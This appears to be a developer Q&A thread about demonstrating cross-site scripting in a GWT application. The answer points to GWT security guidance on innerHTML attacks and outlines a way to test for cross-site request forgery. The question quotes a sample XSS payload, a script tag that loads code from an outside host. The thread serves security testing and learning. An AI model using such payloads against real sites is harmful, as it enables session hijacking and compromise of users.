# GWT -xss(cross site scripting) Demo

Tags: google-app-engine, gwt, xss

I have been looking to demo a sample xss attack via GWT(V2.4.0).I created a form(GET Method) with html text area and a submit button ,on submit it calls the server via gwt rpc, if there is a xss vulnerability, sample test case`//<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> //` should not be filtered.But this does not work,Could any one please share how to perform xss attack ? just an overview or gist would be fine.

Answer (score 1):

Look at https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss

There is an example of how to use inner html to launch an attack. See the section

> Code that sets innerHTML

It gives countermeasures on the page as well.

If you are talking about XSRF, then as suggested

> Cross-Site Request Forgery (XSRF or CSRF) is a type of web attack
>   where an attacker can perform actions on behalf of an authenticated
>   user without user's knowledge. Typically, it involves crafting a
>   malicious HTML page, which, once visited by a victim, will cause the
>   victim's browser to issue an attacker-controlled request to a
>   third-party domain. If the victim is authenticated to the third-party
>   domain, the request will be sent with the browser's cookies for that
>   domain, and could potentially trigger an undesirable action on behalf
>   of the victim and without victim's consent - for example, delete or
>   modify a blog or add a mail forward rule.

you could just make a page to send an (unauthenticated) rpc request, and if your browser passes along an already authenticated user's cookie and the rpc call succeeds, then the attack worked.

Comment: i am looking out for xss attack :),between xsrf was informative

Comment: yeah and there is an example you can use in the first link Code that sets innerHTML